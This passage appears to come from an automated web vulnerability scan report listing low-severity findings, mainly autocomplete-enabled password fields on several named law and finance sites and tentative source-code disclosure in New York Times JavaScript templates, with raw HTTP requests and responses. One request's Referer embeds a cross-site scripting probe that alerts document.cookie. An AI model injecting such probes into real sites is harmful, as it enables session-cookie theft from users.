Set-Cookie: _referrer=||||http://www.gobignetwork.com/funding||||5/12/2011 7:01 AM; expires=Sun, 06-May-2012 11:01:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:01:18 GMT
Content-Length: 56329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
<div style="width:280px; margin-left:auto; margin-right:auto;">

<form id="LoginForm1" method="post" action="https://www.gobignetwork.com/authentication/login">
<label for="userName" style="color:#243748; display:block; font-weight:bold;">
...[SNIP]...
</div>
<input id="password" name="password" style="background-color:#FFFFFF;border:1px solid #D8E3EC;font-size:18px;margin-bottom:15px;width:250px;" tabindex="2" type="password" value="" /><br />
...[SNIP]...

15.16. http://www.huroncapital.com/secure/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.huroncapital.com
Path:   /secure/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /secure/ HTTP/1.1
Host: www.huroncapital.com
Proxy-Connection: keep-alive
Referer: http://www.huroncapital.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:13:52 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Set-Cookie: SESSIONID=9d65c422a80d78d0b2c9cee35d9a8062; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8870

<html>

   <head>
       <meta http-equiv="Content-Language" content="en-us">
       <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
       <meta name="generator" content="Adobe GoLive
...[SNIP]...
</P>

<form method="post" action="index.html" name="loginform">
<div align="center">
...[SNIP]...
<td><input name="password" type="password" size="20" maxlength="50"></td>
...[SNIP]...

15.17. http://www.pillsburylaw.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812913;path=/
Set-Cookie: CFTOKEN=26160612;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 12:22:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
</div>
                   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
                   <label>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
                       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
                   </label>
...[SNIP]...

15.18. http://www.pillsburylaw.com/index.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<div class="box" id="loginbox">

   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
   <h2>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
   </label>
...[SNIP]...

15.19. http://www.pillsburylaw.com/index.cfm

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /index.cfm?pageID=60&p=createaccount HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.3.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
</p>
   <form name="registrationForm" id="registrationForm" action="/index.cfm?pageID=60&p=createaccount2" method="post" class="formborder" onsubmit="return _CF_checkregistrationForm(this)">
       <table border="0" cellpadding="0" cellspacing="0" width="100%">
...[SNIP]...
<td style="padding-left:10px;"><input style="width:200px;" id="password" name="password" value="" type="password" class="required" /></td>
...[SNIP]...
<td style="padding-left:10px;"><input style="width:200px;" id="password2" name="password2" value="" type="password" class="required" equalTo="#password"></td>
...[SNIP]...

15.20. http://www.privateequityinfo.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Firms, Hedge Funds, Mezzanine Investors, Small Business Investment Companies (SBIC), Valuation Fi
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
           <form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
               <tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

15.21. http://www.privateequityinfo.com/forgotpassword.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /forgotpassword.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /forgotpassword.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/product_details.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=222922074

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 21431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Info - Forgot Your Password?</title>
<meta name="description" content="Database of private equit
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
           <form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
               <tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

15.22. http://www.privateequityinfo.com/product_details.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /product_details.php

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /product_details.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Product details</title>
<meta name="description" content="Database of Private Equity Firms, Hedge Funds, Mezzan
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
           <form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
               <tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

15.23. http://www.soundpatheview.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.soundpatheview.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.soundpatheview.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title
...[SNIP]...
<div id="form_mods">
               <form id="hostform" action="">
                   <div class="form_cont">
...[SNIP]...
</div>
        <input type="password" id="host_pin" name="Password" title="Pin" maxlength="17" value="" />
        <div>
...[SNIP]...

16. Source code disclosure
There are 10 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


16.1. http://graphics8.nytimes.com/js/adx/googleads.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/adx/googleads.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/adx/googleads.js HTTP/1.1
Host: graphics8.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=53C30AB57480F9FF91684174FCA4F3EF&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.13.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305122094061:ss=1305120271481; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 17979
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Mar 2011 20:04:32 GMT
ETag: "463b-4d8a5250"
Accept-Ranges: bytes
Cache-Control: private, max-age=126326
Date: Thu, 12 May 2011 11:25:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17979

/*global NYTD, window, escape */
/*    
$Id: googleads.js 62240 2011-03-22 20:02:02Z helckt $    
(c) 2010 The New York Times Company    
*/


NYTD.GoogleAds = NYTD.GoogleAds || {
   
   defaultGoogleParam
...[SNIP]...
<a href="#" onclick="linkbox(\'<%=url%>\',\'popWin\')">
...[SNIP]...
<span class="blue"><%=line1%></span><%=line2%><br/>'+
                   '<div class="link"><%=visibleUrl%></div>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="blue" href="#"><%=line1%></a>' +
               '<br/><%=line2%><br/><%=line3%><br/>
...[SNIP]...
<a onclick="linkbox(\'<%=url%>\',\'popWin\')" class="green" href="#"><%=visibleUrl%></a>
...[SNIP]...
<a href="http://<%=queryHost%>/search/query?srchst=r&term=<%=term%>&google_ad_channel=health&' +
               'google_ad_client=ca-nytimes_radlinks_js&google_page_url=<%=thisPage%>">' +
                   '<%=term%>' +
               '</a>
...[SNIP]...
<tr class="listing" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">
...[SNIP]...
<a class="first" target="_blank" href="<%=url%>"><%=line1%></a><br/>' +
                   '<%=line2%><br/>' +
                   '<%=line3%><br/>' +
                   '<a class="last" target="_blank" href="<%=url%>"><%=visibleUrl%></a>
...[SNIP]...
<a href="<%=url%>" target="_top" title="go to <%=visibleUrl%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<img border="0" src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%>">
...[SNIP]...
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="<%=imageWidth%>" height="<%=imageHeight%>" bidtype="<%=bidType%>" targetingType="<%=targetingType%>">' +
                   '<param name="movie" value="<%=imageUrl%>">
...[SNIP]...
<embed src="<%=imageUrl%>" width="<%=imageWidth%>" height="<%=imageHeight%> type="application/x-shockwave-flash" AllowScriptAccess="never" pluginspage="http://www.macromedia.com/go/getflashplayer">
...[SNIP]...

16.2. http://graphics8.nytimes.com/js/app/community/V3/commentsTemplates.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://graphics8.nytimes.com
Path:   /js/app/community/V3/commentsTemplates.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/app/community/V3/commentsTemplates.js HTTP/1.1
Host: graphics8.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 13747
Content-Type: application/x-javascript
Last-Modified: Mon, 02 May 2011 12:34:08 GMT
ETag: "35b3-4dbea4c0"
Accept-Ranges: bytes
Cache-Control: private, max-age=290735
Date: Thu, 12 May 2011 11:03:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13747

/**
* $Id: commentsTemplates.js 64599 2011-04-12 06:16:53Z shahmeet.singh $
* NYTD Namespace is included in common.js
*/

NYTD.CRNR = window.NYTD.CRNR || {};

NYTD.CRNR.Templates.HeaderTemplat
...[SNIP]...
<h3 class="share"> \
       <% if(dataForTemplate.commentCountFlag == true) { %> \
           <%= dataForTemplate.totalComments %> of <%= dataForTemplate.totalcommentCount %> Readers\' Comments</h3> \
       <% } else { %> \
           <%= dataForTemplate.totalComments %> Readers\' Comments</h3>
...[SNIP]...
<% } %> \
       <% if(dataForTemplate.postCommentFlag) { %> \
           <div class="postComment">
...[SNIP]...
<li class="first <%= dataForTemplate.sortFilterTabs["allComments"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=<%= dataForTemplate.sortOrder %>">
...[SNIP]...
<li class="<%= dataForTemplate.sortFilterTabs["highlights"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=highlights">
...[SNIP]...
<li class="<%= dataForTemplate.sortFilterTabs["recommended"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=recommended">
...[SNIP]...
</li> \
           <% if(dataForTemplate.repliesFlag) { %> \
               <li class="<%= dataForTemplate.sortFilterTabs["replied"] %>"><a href="<%= dataForTemplate.overflowPageURL %>?sort=replied">
...[SNIP]...
<div class="guideKicker clearfix"> \
           <% if(dataForTemplate.sortFilterTabs["allComments"] == "selected") { %> \
               <div class="sortSequence">
...[SNIP]...
<ul> \
                       <% if(dataForTemplate.sortOrder == "oldest") { %> \
                           <li class="first">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=newest">
...[SNIP]...
</li> \
                       <% } else { %> \
                           <li class="first">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=oldest">
...[SNIP]...
<% } %> \
           <% if(dataForTemplate.totalCommentPages > 1) { %> \
               <div class="pagination">
...[SNIP]...
<input type="text" name="offset" onkeydown="NYTD.CRNR.pagination.paginate([event,this.value,<%= dataForTemplate.totalCommentPages %>])" value="1" name="offset"/><span class="paginationvalue"> of <%= dataForTemplate.totalCommentPages %></span>
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=<%= dataForTemplate.sortOrder %>&amp;offset=2">
...[SNIP]...
</div> \
   <% if(dataForTemplate.totalComments == 0) { %> \
                       <div class="header clearfix">
...[SNIP]...
<% } %> \
';

NYTD.CRNR.Templates.FooterTemplate = ' \
   <% if(dataForTemplate.totalCommentPages > 1) { %> \
       <div class="guideKicker backLink clearfix">
...[SNIP]...
<input type="text" name="offset" onkeydown="NYTD.CRNR.pagination.paginate([event,this.value,<%= dataForTemplate.totalCommentPages %>])" value="1" name="offset"/>
...[SNIP]...
<span class="paginationvalue"> of <%= dataForTemplate.totalCommentPages %></span>
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?sort=<%= dataForTemplate.pageSort %>&amp;offset=2">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?permid=<%= dataForTemplate.commentSequence %>#comment<%= dataForTemplate.commentSequence %>" name="comment<%= dataForTemplate.commentSequence %>"><%= dataForTemplate.commentSequence %></a>.</div> \
           <div class="displayName"> \
               <% if(dataForTemplate.shareTP == true) { %> \
                   <a href="http://timespeople.nytimes.com/view/user/<%= dataForTemplate.userID %>/activities.html"><%= dataForTemplate.userDisplayName %></a> \
               <% } else { %> \
                   <%= dataForTemplate.userDisplayName %> \
               <% } %>
...[SNIP]...
<div class="location"><%= dataForTemplate.userLocation %></div> \
           <div class="date"><%= dataForTemplate.approveDate %></div> \
           <div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reviewText"><%= dataForTemplate.commentBody %></div>
...[SNIP]...
<div id="recommendation_<%= dataForTemplate.commentSequence %>" class="feedback">
...[SNIP]...
<span class="link"> \
                   <%= dataForTemplate.commentRecommend %> \
               </span> <!-- Close link Span --> \
               <% if(dataForTemplate.commentRecommended == true) { %> \
                   <span> \
               <% } else { %> \
                   <span class="caption">
...[SNIP]...
<% } %> \
               Recommended by <%= dataForTemplate.commentRecommendations %> Readers </span>
...[SNIP]...
<span name="reply" class="feedback" id="<%= dataForTemplate.commentSequence %>">
...[SNIP]...
<!-- Close recommendation Div --> \
                               <% if(dataForTemplate.loggedIn == true) { %> \
                                       <div class="reportAbuse"> \
               <% if(dataForTemplate.reportAbuseFlag == true) { %> \
                                               <span class="flagged">
...[SNIP]...
</span> \
               <% } else { %> \
                                               <a href="#" id="<%= dataForTemplate.commentSequence %>" onclick="NYTD.CRNR.overlay.appear(event);return false;">
...[SNIP]...
<a href="<%= dataForTemplate.overflowPageURL %>?permid=<%= dataForTemplate.commentSequence %>#comment<%= dataForTemplate.commentSequence %>" name="comment<%= dataForTemplate.commentSequence %>"><%= dataForTemplate.commentSequence %></a>
...[SNIP]...
<div class="displayName"> \
               <% if(dataForTemplate.shareTP == true) { %> \
                   <a href="http://timespeople.nytimes.com/view/user/<%= dataForTemplate.userID %>/activities.html"><%= dataForTemplate.userDisplayName %></a> \
               <% } else { %> \
                   <%= dataForTemplate.userDisplayName %> \
               <% } %>
...[SNIP]...
<div class="location"><%= dataForTemplate.userLocation %></div> \
           <div class="date"><%= dataForTemplate.approveDate %></div> \
           <div class="time"><%= dataForTemplate.approveTime %></div>
...[SNIP]...
<div class="reviewText"><%= dataForTemplate.commentBody %></div>
...[SNIP]...
<div id="recommendation_<%= dataForTemplate.commentSequence %>" class="feedback">
...[SNIP]...
<span class="link"> \
                       <%= dataForTemplate.commentRecommend %> \
                   </span> <!-- Close link Span --> \
                   <% if(dataForTemplate.commentRecommended == true) { %> \
                       <span> \
                   <% } else { %> \
                       <span class="caption">
...[SNIP]...
<% } %> \
                   Recommended by <%= dataForTemplate.commentRecommendations %> Readers </span>
...[SNIP]...
<span name="reply" class="feedback" id="<%= dataForTemplate.commentSequence %>">
...[SNIP]...
<!-- Close recommendation Div --> \
                                       <% if(dataForTemplate.loggedIn == true) { %> \
